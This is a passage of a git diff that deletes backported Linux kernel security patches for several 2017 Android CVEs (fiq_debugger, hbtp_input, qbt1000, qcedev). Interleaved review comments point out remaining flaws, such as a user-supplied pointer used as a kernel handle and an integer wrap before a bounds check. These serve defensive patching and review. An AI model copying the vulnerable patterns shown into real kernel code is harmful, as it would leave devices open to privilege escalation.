-@@ -425,29 +426,39 @@ static void fiq_debugger_irq_exec(struct fiq_debugger_state *state, char *cmd)
- static void fiq_debugger_help(struct fiq_debugger_state *state)
- {
- fiq_debugger_printf(&state->output,
-- "FIQ Debugger commands:\n"
-- " pc PC status\n"
-- " regs Register dump\n"
-- " allregs Extended Register dump\n"
-- " bt Stack trace\n"
-- " reboot [] Reboot with command \n"
-- " reset [] Hard reset with command \n"
-- " irqs Interupt status\n"
-- " kmsg Kernel log\n"
-- " version Kernel version\n");
-- fiq_debugger_printf(&state->output,
-- " sleep Allow sleep while in FIQ\n"
-- " nosleep Disable sleep while in FIQ\n"
-- " console Switch terminal to console\n"
-- " cpu Current CPU\n"
-- " cpu Switch to CPU\n");
-+ "FIQ Debugger commands:\n");
-+ if (sysrq_on()) {
-+ fiq_debugger_printf(&state->output,
-+ " pc PC status\n"
-+ " regs Register dump\n"
-+ " allregs Extended Register dump\n"
-+ " bt Stack trace\n");
-+ fiq_debugger_printf(&state->output,
-+ " reboot [] Reboot with command \n"
-+ " reset [] Hard reset with command \n"
-+ " irqs Interrupt status\n"
-+ " kmsg Kernel log\n"
-+ " version Kernel version\n");
-+ fiq_debugger_printf(&state->output,
-+ " cpu Current CPU\n"
-+ " cpu Switch to CPU\n"
-+ " sysrq sysrq options\n"
-+ " sysrq Execute sysrq with \n");
-+ } else {
-+ fiq_debugger_printf(&state->output,
-+ " reboot Reboot\n"
-+ " reset Hard reset\n"
-+ " irqs Interrupt status\n");
-+ }
- fiq_debugger_printf(&state->output,
-- " ps Process list\n"
-- " sysrq sysrq options\n"
-- " sysrq Execute sysrq with \n");
-+ " sleep Allow sleep while in FIQ\n"
-+ " nosleep Disable sleep while in FIQ\n"
-+ " console Switch terminal to console\n"
-+ " ps Process list\n");
- #ifdef CONFIG_KGDB
-- fiq_debugger_printf(&state->output,
-- " kgdb Enter kernel debugger\n");
-+ if (fiq_kgdb_enable) {
-+ fiq_debugger_printf(&state->output,
-+ " kgdb Enter kernel debugger\n");
- #endif
- }
-
-@@ -479,18 +490,23 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- if (!strcmp(cmd, "help") || !strcmp(cmd, "?")) {
- fiq_debugger_help(state);
- } else if (!strcmp(cmd, "pc")) {
-- fiq_debugger_dump_pc(&state->output, regs);
-+ if (sysrq_on())
-+ fiq_debugger_dump_pc(&state->output, regs);
- } else if
(!strcmp(cmd, "regs")) {
-- fiq_debugger_dump_regs(&state->output, regs);
-+ if (sysrq_on())
-+ fiq_debugger_dump_regs(&state->output, regs);
- } else if (!strcmp(cmd, "allregs")) {
-- fiq_debugger_dump_allregs(&state->output, regs);
-+ if (sysrq_on())
-+ fiq_debugger_dump_allregs(&state->output, regs);
- } else if (!strcmp(cmd, "bt")) {
-- fiq_debugger_dump_stacktrace(&state->output, regs, 100, svc_sp);
-+ if (sysrq_on())
-+ fiq_debugger_dump_stacktrace(&state->output, regs,
-+ 100, svc_sp);
- } else if (!strncmp(cmd, "reset", 5)) {
- cmd += 5;
- while (*cmd == ' ')
- cmd++;
-- if (*cmd) {
-+ if (*cmd && sysrq_on()) {
- char tmp_cmd[32];
- strlcpy(tmp_cmd, cmd, sizeof(tmp_cmd));
- machine_restart(tmp_cmd);
-@@ -500,9 +516,12 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- } else if (!strcmp(cmd, "irqs")) {
- fiq_debugger_dump_irqs(state);
- } else if (!strcmp(cmd, "kmsg")) {
-- fiq_debugger_dump_kernel_log(state);
-+ if (sysrq_on())
-+ fiq_debugger_dump_kernel_log(state);
- } else if (!strcmp(cmd, "version")) {
-- fiq_debugger_printf(&state->output, "%s\n", linux_banner);
-+ if (sysrq_on())
-+ fiq_debugger_printf(&state->output, "%s\n",
-+ linux_banner);
- } else if (!strcmp(cmd, "sleep")) {
- state->no_sleep = false;
- fiq_debugger_printf(&state->output, "enabling sleep\n");
-@@ -514,14 +533,17 @@ static bool fiq_debugger_fiq_exec(struct fiq_debugger_state *state,
- fiq_debugger_uart_flush(state);
- state->console_enable = true;
- } else if (!strcmp(cmd, "cpu")) {
-- fiq_debugger_printf(&state->output, "cpu %d\n", state->current_cpu);
-- } else if (!strncmp(cmd, "cpu ", 4)) {
-+ if (sysrq_on())
-+ fiq_debugger_printf(&state->output, "cpu %d\n",
-+ state->current_cpu);
-+ } else if (!strncmp(cmd, "cpu ", 4) && sysrq_on()) {
- unsigned long cpu = 0;
- if (kstrtoul(cmd + 4, 10, &cpu) == 0)
- fiq_debugger_switch_cpu(state, cpu);
- else
- fiq_debugger_printf(&state->output, "invalid cpu\n");
-- fiq_debugger_printf(&state->output, "cpu %d\n",
state->current_cpu);
-+ fiq_debugger_printf(&state->output, "cpu %d\n",
-+ state->current_cpu);
- } else {
- if (state->debug_busy) {
- fiq_debugger_printf(&state->output,
-diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c
-index d0c19b1..2ecb363 100644
----- a/drivers/tty/sysrq.c
-+++ b/drivers/tty/sysrq.c
-@@ -58,10 +58,11 @@ static bool __read_mostly sysrq_always_enabled;
- unsigned short platform_sysrq_reset_seq[] __weak = { KEY_RESERVED };
- int sysrq_reset_downtime_ms __weak;
-
--static bool sysrq_on(void)
-+bool sysrq_on(void)
- {
- return sysrq_enabled || sysrq_always_enabled;
- }
-+EXPORT_SYMBOL(sysrq_on);
-
- /*
- * A value of 1 means 'all', other nonzero values are an op mask:
-diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h
-index 387fa7d..d802692 100644
----- a/include/linux/sysrq.h
-+++ b/include/linux/sysrq.h
-@@ -42,6 +42,7 @@ struct sysrq_key_op {
- * are available -- else NULL's).
- */
-
-+bool sysrq_on(void);
- void handle_sysrq(int key);
- void __handle_sysrq(int key, bool check_mask);
- int register_sysrq_key(int key, struct sysrq_key_op *op);
---
-cgit v1.1
-
diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch b/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch
deleted file mode 100644
index 4ab6691b..00000000
--- a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch
+++ /dev/null
@@ -1,213 +0,0 @@ -From faca1e5a1ca8f637ac0c213094159ea4fae059f9 Mon Sep 17 00:00:00 2001 -From: Mark Salyzyn -Date: Tue, 20 Dec 2016 15:59:19 -0800 -Subject: [PATCH] BACKPORT: fiq_debugger: restrict access to critical commands. - -Sysrq must be enabled via /proc/sys/kernel/sysrq as a security -measure to enable various critical fiq debugger commands that -either leak information or can be used as a system attack. - -Default disabled, this will leave the reboot, reset, irqs, sleep, -nosleep, console and ps commands. Reboot and reset commands -will be restricted from taking any parameters. We will also -switch to showing the limited command set in this mode. - -Signed-off-by: Mark Salyzyn -Bug: 32402555 -[d-cagle@codeaurora.org: Resolve merge conflict] -Git-repo: https://android.googlesource.com/kernel/msm -Git-commit: 1031836c0895f1f5a05c25efec83bfa11aa08ca9 -Signed-off-by: Dennis Cagle - -Backport reference: - * Adapted for arch/arm/common/fiq_debugger.c - * Adapt to the old use of debug_printf - -Change-Id: I0a6aecd9b3d5bd62db06beac76682349854198d7 -Signed-off-by: Adrian DC ---- - -diff --git a/arch/arm/common/fiq_debugger.c b/arch/arm/common/fiq_debugger.c -index 518b4b5..5e0e3ed 100644 ---- a/arch/arm/common/fiq_debugger.c -+++ b/arch/arm/common/fiq_debugger.c -@@ -30,6 +30,7 @@ - #include - #include - #include -+#include - #include - #include - #include -@@ -580,12 +581,13 @@ - cmd += 6; - while (*cmd == ' ') - cmd++; -- if (cmd != '\0') -+ if ((cmd != '\0') && sysrq_on()) - kernel_restart(cmd); - else - kernel_restart(NULL); - } else { -- debug_printf(state, "unknown work command '%s'\n", work_cmd); -+ debug_printf(state, "unknown work command '%s'\n", -+ work_cmd); - } - } - -@@ -608,26 +610,40 @@ - - static void debug_help(struct fiq_debugger_state *state) - { -- debug_printf(state, "FIQ Debugger commands:\n" -- " pc PC status\n" -- " regs Register dump\n" -- " allregs Extended Register dump\n" -- " bt Stack trace\n" -- " reboot [] Reboot with command \n" 
-- " reset [] Hard reset with command \n" -- " irqs Interupt status\n" -- " kmsg Kernel log\n" -- " version Kernel version\n"); -- debug_printf(state, " sleep Allow sleep while in FIQ\n" -- " nosleep Disable sleep while in FIQ\n" -- " console Switch terminal to console\n" -- " cpu Current CPU\n" -- " cpu Switch to CPU\n"); -- debug_printf(state, " ps Process list\n" -- " sysrq sysrq options\n" -- " sysrq Execute sysrq with \n"); -+ debug_printf(state, -+ "FIQ Debugger commands:\n"); -+ if (sysrq_on()) { -+ debug_printf(state, -+ " pc PC status\n" -+ " regs Register dump\n" -+ " allregs Extended Register dump\n" -+ " bt Stack trace\n"); -+ debug_printf(state, -+ " reboot [] Reboot with command \n" -+ " reset [] Hard reset with command \n" -+ " irqs Interrupt status\n" -+ " kmsg Kernel log\n" -+ " version Kernel version\n"); -+ debug_printf(state, -+ " cpu Current CPU\n" -+ " cpu Switch to CPU\n" -+ " sysrq sysrq options\n" -+ " sysrq Execute sysrq with \n"); -+ } else { -+ debug_printf(state, -+ " reboot Reboot\n" -+ " reset Hard reset\n" -+ " irqs Interrupt status\n"); -+ } -+ debug_printf(state, -+ " sleep Allow sleep while in FIQ\n" -+ " nosleep Disable sleep while in FIQ\n" -+ " console Switch terminal to console\n" -+ " ps Process list\n"); - #ifdef CONFIG_KGDB -- debug_printf(state, " kgdb Enter kernel debugger\n"); -+ if (fiq_kgdb_enable) { -+ debug_printf(state, -+ " kgdb Enter kernel debugger\n"); - #endif - } - -@@ -657,19 +673,24 @@ - if (!strcmp(cmd, "help") || !strcmp(cmd, "?")) { - debug_help(state); - } else if (!strcmp(cmd, "pc")) { -- debug_printf(state, " pc %08x cpsr %08x mode %s\n", -- regs[15], regs[16], mode_name(regs[16])); -+ if (sysrq_on()) -+ debug_printf(state, " pc %08x cpsr %08x mode %s\n", -+ regs[15], regs[16], mode_name(regs[16])); - } else if (!strcmp(cmd, "regs")) { -- dump_regs(state, regs); -+ if (sysrq_on()) -+ dump_regs(state, regs); - } else if (!strcmp(cmd, "allregs")) { -- dump_allregs(state, regs); -+ if (sysrq_on()) -+ 
dump_allregs(state, regs); - } else if (!strcmp(cmd, "bt")) { -- dump_stacktrace(state, (struct pt_regs *)regs, 100, svc_sp); -+ if (sysrq_on()) -+ dump_stacktrace(state, (struct pt_regs *)regs, -+ 100, svc_sp); - } else if (!strncmp(cmd, "reset", 5)) { - cmd += 5; - while (*cmd == ' ') - cmd++; -- if (*cmd) { -+ if (*cmd && sysrq_on()) { - char tmp_cmd[32]; - strlcpy(tmp_cmd, cmd, sizeof(tmp_cmd)); - machine_restart(tmp_cmd); -@@ -679,9 +700,12 @@ - } else if (!strcmp(cmd, "irqs")) { - dump_irqs(state); - } else if (!strcmp(cmd, "kmsg")) { -- dump_kernel_log(state); -+ if (sysrq_on()) -+ dump_kernel_log(state); - } else if (!strcmp(cmd, "version")) { -- debug_printf(state, "%s\n", linux_banner); -+ if (sysrq_on()) -+ debug_printf(state, "%s\n", -+ linux_banner); - } else if (!strcmp(cmd, "sleep")) { - state->no_sleep = false; - debug_printf(state, "enabling sleep\n"); -@@ -693,14 +717,17 @@ - debug_uart_flush(state); - state->console_enable = true; - } else if (!strcmp(cmd, "cpu")) { -- debug_printf(state, "cpu %d\n", state->current_cpu); -- } else if (!strncmp(cmd, "cpu ", 4)) { -+ if (sysrq_on()) -+ debug_printf(state, "cpu %d\n", -+ state->current_cpu); -+ } else if (!strncmp(cmd, "cpu ", 4) && sysrq_on()) { - unsigned long cpu = 0; - if (strict_strtoul(cmd + 4, 10, &cpu) == 0) - switch_cpu(state, cpu); - else - debug_printf(state, "invalid cpu\n"); -- debug_printf(state, "cpu %d\n", state->current_cpu); -+ debug_printf(state, "cpu %d\n", -+ state->current_cpu); - } else { - if (state->debug_busy) { - debug_printf(state, -diff --git a/drivers/tty/sysrq.c b/drivers/tty/sysrq.c -index 05728894..6efbfb7 100644 ---- a/drivers/tty/sysrq.c -+++ b/drivers/tty/sysrq.c -@@ -49,10 +49,11 @@ - static int __read_mostly sysrq_enabled = SYSRQ_DEFAULT_ENABLE; - static bool __read_mostly sysrq_always_enabled; - --static bool sysrq_on(void) -+bool sysrq_on(void) - { - return sysrq_enabled || sysrq_always_enabled; - } -+EXPORT_SYMBOL(sysrq_on); - - /* - * A value of 1 means 
'all', other nonzero values are an op mask: -diff --git a/include/linux/sysrq.h b/include/linux/sysrq.h -index 7faf933..5a0bd93 100644 ---- a/include/linux/sysrq.h -+++ b/include/linux/sysrq.h -@@ -45,6 +45,7 @@ - * are available -- else NULL's). - */ - -+bool sysrq_on(void); - void handle_sysrq(int key); - void __handle_sysrq(int key, bool check_mask); - int register_sysrq_key(int key, struct sysrq_key_op *op); diff --git a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch.base64 b/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch.base64 deleted file mode 100644 index f0cea285..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0510/3.4/0001.patch.base64 +++ /dev/null @@ -1 +0,0 @@ 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 \ No newline at end of file diff --git a/Patches/Linux_CVEs/CVE-2017-0516/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0516/ANY/0001.patch deleted file mode 100644 index 84d7b87f..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0516/ANY/0001.patch +++ /dev/null 
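Review bot: In the debug_help() hunk of this 3.4 backport, the added `if (fiq_kgdb_enable) {` opens a brace inside `#ifdef CONFIG_KGDB` that is not closed before `#endif`. With CONFIG_KGDB set, the function's own closing brace is consumed by the `if` and the file should fail to build; either drop the brace or add `}` before `#endif`. In the reboot work-command hunk, `if ((cmd != '\0') && sysrq_on())` compares the pointer rather than the character it points to, so an empty argument string is still passed to kernel_restart() once sysrq is on. `if (*cmd && sysrq_on())` would match the reset path later in the same patch. Whether `fiq_kgdb_enable` is declared in this tree cannot be confirmed from the hunks shown.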
@@ -1,37 +0,0 @@ -From 0dba52cf7955306c71fb76d16437d848c953e462 Mon Sep 17 00:00:00 2001 -From: Vevek Venkatesan -Date: Fri, 23 Dec 2016 11:34:32 +0530 -Subject: input: misc: fix heap overflow issue in hbtp_input.c - -Add the boundary check for ABS code before setting ABS params, -to avoid heap overflow. - -Change-Id: I6aad9916c92d2f775632406374dbb803063148de -Signed-off-by: Vevek Venkatesan ---- - drivers/input/misc/hbtp_input.c | 8 ++++++-- - 1 file changed, 6 insertions(+), 2 deletions(-) - -diff --git a/drivers/input/misc/hbtp_input.c b/drivers/input/misc/hbtp_input.c -index 4c0e9a9..e80afcf 100644 ---- a/drivers/input/misc/hbtp_input.c -+++ b/drivers/input/misc/hbtp_input.c -@@ -130,9 +130,13 @@ static int hbtp_input_create_input_dev(struct hbtp_input_absinfo *absinfo) - input_mt_init_slots(input_dev, HBTP_MAX_FINGER, 0); - for (i = 0; i <= ABS_MT_LAST - ABS_MT_FIRST; i++) { - abs = absinfo + i; -- if (abs->active) -- input_set_abs_params(input_dev, abs->code, -+ if (abs->active) { -+ if (abs->code >= 0 && abs->code < ABS_CNT) -+ input_set_abs_params(input_dev, abs->code, - abs->minimum, abs->maximum, 0, 0); -+ else -+ pr_err("%s: ABS code out of bound\n", __func__); -+ } - } - - error = input_register_device(input_dev); --- -cgit v1.1 - diff --git a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0518/3.18/0001.patch deleted file mode 100644 index 3af62a34..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0001.patch +++ /dev/null 
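Review bot: An out-of-range `abs->code` is only logged and skipped inside the loop of hbtp_input_create_input_dev(), so the input device is still registered from an absinfo array the driver has just found to be invalid. Failing the call through the function's existing error path (which lies outside this hunk) would make the rejection visible to the caller. If absinfo is caller-supplied, which the hunk does not show, the unconditional `pr_err` can be triggered repeatedly, and `pr_err_ratelimited("%s: ABS code out of bound\n", __func__);` would bound the log volume. The `abs->code >= 0` half of the test only has an effect if `code` is a signed type.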
@@ -1,39 +0,0 @@ -From 015d1d5dc8c42d6ab92a31b99cd9f089fae1d27e Mon Sep 17 00:00:00 2001 -From: Dennis Cagle -Date: Fri, 6 Jan 2017 15:50:35 -0800 -Subject: [PATCH] QBT1000: check for null pointer before copying command - -A null command buffer will cause a null pointer crash. -Check for it. - -Bug: 32372915 -Bug: 32370896 -CRs-fixed: 1041652, 1081802 -Change-Id: I37a0c8b9fe2c144fb4e75036509bf7ec07604ea7 -Signed-off-by: Lior Barenboim -Signed-off-by: Dennis Cagle ---- - drivers/soc/qcom/qbt1000.c | 7 +++++++ - 1 file changed, 7 insertions(+) - mode change 100644 => 100755 drivers/soc/qcom/qbt1000.c - -diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c -old mode 100644 -new mode 100755 -index 135e2b834db30..101fcedd1f2c0 ---- a/drivers/soc/qcom/qbt1000.c -+++ b/drivers/soc/qcom/qbt1000.c -@@ -862,6 +862,13 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - if (rc != 0) - goto end; - -+ if (!aligned_cmd) { -+ dev_err(drvdata->dev, "%s: Null command buffer\n", -+ __func__); -+ rc = -EINVAL; -+ goto end; -+ } -+ - rc = copy_from_user(aligned_cmd, (void __user *)tzcmd.req_buf, - tzcmd.req_buf_len); - if (rc != 0) { diff --git a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0002.patch b/Patches/Linux_CVEs/CVE-2017-0518/3.18/0002.patch deleted file mode 100644 index 8c22345b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0518/3.18/0002.patch +++ /dev/null 
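Review bot: The new `if (!aligned_cmd)` guard in qbt1000_ioctl() covers only the command buffer. The response buffer filled in by the same preceding call (named `aligned_rsp` in the later qbt1000 patch on this page) is not checked in this hunk, and a NULL there would presumably fault on its later use. Testing both, `if (!aligned_cmd || !aligned_rsp) {`, or having the helper return an error when the shared buffer is NULL, would handle the case at its source. The patch also changes drivers/soc/qcom/qbt1000.c from mode 100644 to 100755, which is unrelated to the fix and should not be carried along. The ioctl body continues outside the hunk.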
@@ -1,138 +0,0 @@ -From a064a44e03158dbf655a866ba21f5d1baa2dee9e Mon Sep 17 00:00:00 2001 -From: Dennis Cagle -Date: Fri, 6 Jan 2017 15:28:20 -0800 -Subject: [PATCH] QBT1000: copy qseecom handle to user when loading/unloading - app - -QBT1000 provides IOCTLs for loading and unloading a QSEE app. -In the input structure for these IOCTLs there is a pointer -to a qseecom handle which serves as an output parameter for -the IOCTLs. That is, the given handle (in client address space) -should be set to a valid handle value on load, and should be set -to 0 on unload. - -The driver was missing a proper copy_to_user() call for this handle, -which sometimes resulted in unload not setting the handle to 0. - -Bug: 32372915 -Bug: 32370896 -CRs-fixed: 1059327 -Change-Id: I31f205afb1f9bf0b6243e3f20f54022525c93b28 -Signed-off-by: Lior Barenboim -Signed-off-by: Dennis Cagle ---- - drivers/soc/qcom/qbt1000.c | 59 ++++++++++++++++++++++++++++++++++++++++++---- - 1 file changed, 55 insertions(+), 4 deletions(-) - -diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c -index 101fcedd1f2c0..961800e2f963f 100755 ---- a/drivers/soc/qcom/qbt1000.c -+++ b/drivers/soc/qcom/qbt1000.c -@@ -772,6 +772,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - case QBT1000_LOAD_APP: - { - struct qbt1000_app app; -+ struct qseecom_handle *app_handle; - - if (copy_from_user(&app, priv_arg, - sizeof(app)) != 0) { -@@ -782,8 +783,15 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - goto end; - } - -+ if (!app.app_handle) { -+ dev_err(drvdata->dev, "%s: LOAD app_handle is null\n", -+ __func__); -+ rc = -EINVAL; -+ goto end; -+ } -+ - /* start the TZ app */ -- rc = qseecom_start_app(app.app_handle, app.name, app.size); -+ rc = qseecom_start_app(&app_handle, app.name, app.size); - if (rc == 0) { - g_app_buf_size = app.size; - } else { -@@ -792,36 +800,79 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long 
arg) - goto end; - } - -+ /* copy the app handle to user */ -+ rc = copy_to_user((void __user *)app.app_handle, &app_handle, -+ sizeof(*app.app_handle)); -+ -+ if (rc != 0) { -+ dev_err(drvdata->dev, -+ "%s: Failed copy 2us LOAD rc:%d\n", -+ __func__, rc); -+ rc = -ENOMEM; -+ goto end; -+ } -+ - break; - } - case QBT1000_UNLOAD_APP: - { - struct qbt1000_app app; -+ struct qseecom_handle *app_handle; - - if (copy_from_user(&app, priv_arg, - sizeof(app)) != 0) { - rc = -ENOMEM; - dev_err(drvdata->dev, -- "%s: Failed copy from user space-LOAD\n", -+ "%s: Failed copy from user space-UNLOAD\n", - __func__); - goto end; - } - -- /* if the app hasn't been loaded already, return err */ - if (!app.app_handle) { -+ dev_err(drvdata->dev, "%s: UNLOAD app_handle is null\n", -+ __func__); -+ rc = -EINVAL; -+ goto end; -+ } -+ -+ rc = copy_from_user(&app_handle, app.app_handle, -+ sizeof(app_handle)); -+ -+ if (rc != 0) { -+ dev_err(drvdata->dev, -+ "%s: Failed copy from user space-UNLOAD handle rc:%d\n", -+ __func__, rc); -+ rc = -ENOMEM; -+ goto end; -+ } -+ -+ /* if the app hasn't been loaded already, return err */ -+ if (!app_handle) { - dev_err(drvdata->dev, "%s: App not loaded\n", - __func__); - rc = -EINVAL; - goto end; - } - -- rc = qseecom_shutdown_app(app.app_handle); -+ rc = qseecom_shutdown_app(&app_handle); - if (rc != 0) { - dev_err(drvdata->dev, "%s: App failed to shutdown\n", - __func__); - goto end; - } - -+ /* copy the app handle (should be null) to user */ -+ rc = copy_to_user((void __user *)app.app_handle, &app_handle, -+ sizeof(*app.app_handle)); -+ -+ if (rc != 0) { -+ dev_err(drvdata->dev, -+ "%s: Failed copy 2us UNLOAD rc:%d\n", -+ __func__, rc); -+ rc = -ENOMEM; -+ goto end; -+ } -+ - break; - } - case QBT1000_SEND_TZCMD: diff --git a/Patches/Linux_CVEs/CVE-2017-0519/3.18/0001.patch b/Patches/Linux_CVEs/CVE-2017-0519/3.18/0001.patch deleted file mode 100644 index 87beefe6..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0519/3.18/0001.patch +++ /dev/null 
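Review bot: The UNLOAD path added here reads `app_handle` back from user memory with copy_from_user() and passes it to `qseecom_shutdown_app(&app_handle)`, so a pointer value chosen by the caller is treated as a kernel object. LOAD in turn writes the real kernel pointer out to user space. The handle should live in driver state and user space should receive at most an opaque token, which is what the follow-up qbt1000 patch on this page does with `drvdata->app_handle`. Separately, failed user copies are reported as `-ENOMEM` where `rc = -EFAULT;` is the conventional code. On LOAD, a failed copy_to_user() also leaves the app started with no handle returned to the caller.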
@@ -1,123 +0,0 @@ -From 2f264730e26a73da973c6eef0e1ee252294ec740 Mon Sep 17 00:00:00 2001 -From: Dennis Cagle -Date: Fri, 6 Jan 2017 15:28:29 -0800 -Subject: [PATCH] soc: qcom: fingerprint: keep QSEE handle in kernel space - -Move the QSEE handle from user space to kernel space. -In addition, fix possible overflow when checking that -the command and response buffers fit in the shared buffer. - -Bug: 32372915 -CRs-fixed: 1086530 -Change-Id: I21b1866546a2825fe348a260c60e341bbe9600ea -Signed-off-by: Lior Barenboim -Signed-off-by: Dennis Cagle ---- - drivers/soc/qcom/qbt1000.c | 31 ++++++++++++++++++++++--------- - 1 file changed, 22 insertions(+), 9 deletions(-) - -diff --git a/drivers/soc/qcom/qbt1000.c b/drivers/soc/qcom/qbt1000.c -index 961800e2f963f..f76cf0f45ecaa 100755 ---- a/drivers/soc/qcom/qbt1000.c -+++ b/drivers/soc/qcom/qbt1000.c -@@ -86,6 +86,7 @@ struct qbt1000_drvdata { - uint32_t ssc_spi_port; - uint32_t ssc_spi_port_slave_index; - struct wakeup_source w_lock; -+ struct qseecom_handle *app_handle; - }; - #define W_LOCK_DELAY_MS (2000) - -@@ -110,7 +111,7 @@ static int get_cmd_rsp_buffers(struct qseecom_handle *hdl, - *cmd_len = ALIGN(*cmd_len, 64); - *rsp_len = ALIGN(*rsp_len, 64); - -- if ((*rsp_len + *cmd_len) > g_app_buf_size) -+ if (((uint64_t)*rsp_len + (uint64_t)*cmd_len) > (uint64_t)g_app_buf_size) - return -ENOMEM; - - *cmd = hdl->sbuf; -@@ -790,8 +791,19 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - goto end; - } - -+ if (drvdata->app_handle) { -+ dev_err(drvdata->dev, "%s: LOAD app already loaded, unloading first\n", -+ __func__); -+ rc = qseecom_shutdown_app(&drvdata->app_handle); -+ if (rc != 0) { -+ dev_err(drvdata->dev, "%s: LOAD current app failed to shutdown\n", -+ __func__); -+ goto end; -+ } -+ } -+ - /* start the TZ app */ -- rc = qseecom_start_app(&app_handle, app.name, app.size); -+ rc = qseecom_start_app(&drvdata->app_handle, app.name, app.size); - if (rc == 0) { - g_app_buf_size = app.size; - 
} else { -@@ -800,7 +812,8 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - goto end; - } - -- /* copy the app handle to user */ -+ /* copy a fake app handle to user */ -+ app_handle = drvdata->app_handle ? (struct qseecom_handle *)123456 : 0; - rc = copy_to_user((void __user *)app.app_handle, &app_handle, - sizeof(*app.app_handle)); - -@@ -817,7 +830,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - case QBT1000_UNLOAD_APP: - { - struct qbt1000_app app; -- struct qseecom_handle *app_handle; -+ struct qseecom_handle *app_handle = 0; - - if (copy_from_user(&app, priv_arg, - sizeof(app)) != 0) { -@@ -847,14 +860,14 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - } - - /* if the app hasn't been loaded already, return err */ -- if (!app_handle) { -+ if (!drvdata->app_handle) { - dev_err(drvdata->dev, "%s: App not loaded\n", - __func__); - rc = -EINVAL; - goto end; - } - -- rc = qseecom_shutdown_app(&app_handle); -+ rc = qseecom_shutdown_app(&drvdata->app_handle); - if (rc != 0) { - dev_err(drvdata->dev, "%s: App failed to shutdown\n", - __func__); -@@ -895,7 +908,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - } - - /* if the app hasn't been loaded already, return err */ -- if (!tzcmd.app_handle) { -+ if (!drvdata->app_handle) { - dev_err(drvdata->dev, "%s: App not loaded\n", - __func__); - rc = -EINVAL; -@@ -905,7 +918,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - /* init command and response buffers and align lengths */ - aligned_cmd_len = tzcmd.req_buf_len; - aligned_rsp_len = tzcmd.rsp_buf_len; -- rc = get_cmd_rsp_buffers(tzcmd.app_handle, -+ rc = get_cmd_rsp_buffers(drvdata->app_handle, - (void **)&aligned_cmd, - &aligned_cmd_len, - (void **)&aligned_rsp, -@@ -930,7 +943,7 @@ static long qbt1000_ioctl(struct file *file, unsigned cmd, unsigned long arg) - } - - /* send cmd to TZ */ -- rc 
= qseecom_send_command(tzcmd.app_handle, -+ rc = qseecom_send_command(drvdata->app_handle, - aligned_cmd, - aligned_cmd_len, - aligned_rsp, diff --git a/Patches/Linux_CVEs/CVE-2017-0520/ANY/0001.patch b/Patches/Linux_CVEs/CVE-2017-0520/ANY/0001.patch deleted file mode 100644 index 9ab0b23b..00000000 --- a/Patches/Linux_CVEs/CVE-2017-0520/ANY/0001.patch +++ /dev/null 
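Review bot: In get_cmd_rsp_buffers() the widened sum `(uint64_t)*rsp_len + (uint64_t)*cmd_len` is evaluated after `ALIGN(*cmd_len, 64)` and `ALIGN(*rsp_len, 64)`. If the lengths are 32-bit (their type is not shown in the hunk), a value within 63 of the maximum wraps to a small number before the comparison, while the ioctl still copies the unaligned `tzcmd.req_buf_len` bytes, as the earlier qbt1000 patch on this page shows. Rejecting oversized raw lengths ahead of the two ALIGN lines keeps the bound sound, for example `if (*cmd_len > g_app_buf_size || *rsp_len > g_app_buf_size) return -ENOMEM;`. The placeholder `(struct qseecom_handle *)123456` would read better as a named constant with a comment stating it is a non-secret token. UNLOAD also still copies a handle in from user space that nothing uses any more.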
@@ -1,304 +0,0 @@ -From eb2aad752c43f57e88ab9b0c3c5ee7b976ee31dd Mon Sep 17 00:00:00 2001 -From: Zhen Kong -Date: Mon, 31 Oct 2016 15:23:19 -0700 -Subject: msm: crypto: fix issues on digest buf and copy_from_user in qcedev.c - -Make the digest length not larger than the size of the buffer -qcedev_areq.sha_op_req.digest; and use the checked variants of -the copy_from/to_user() APIs to avoid small race window of their -unchecked variants. - -Change-Id: I3db0c20ac5fa47ed278f3d60368c406f472430c1 -Signed-off-by: Zhen Kong ---- - drivers/crypto/msm/qcedev.c | 120 ++++++++++---------------------------------- - 1 file changed, 27 insertions(+), 93 deletions(-) - -diff --git a/drivers/crypto/msm/qcedev.c b/drivers/crypto/msm/qcedev.c -index 1402d3d..433e478 100644 ---- a/drivers/crypto/msm/qcedev.c -+++ b/drivers/crypto/msm/qcedev.c -@@ -603,7 +603,7 @@ static int qcedev_sha_update_max_xfer(struct qcedev_async_req *qcedev_areq, - while (len > 0) { - user_src = - (void __user *)qcedev_areq->sha_op_req.data[i].vaddr; -- if (user_src && __copy_from_user(k_src, -+ if (user_src && copy_from_user(k_src, - (void __user *)user_src, - qcedev_areq->sha_op_req.data[i].len)) - return -EFAULT; -@@ -639,7 +639,7 @@ static int qcedev_sha_update_max_xfer(struct qcedev_async_req *qcedev_areq, - - /* Copy data from user src(s) */ - user_src = (void __user *)qcedev_areq->sha_op_req.data[0].vaddr; -- if (user_src && 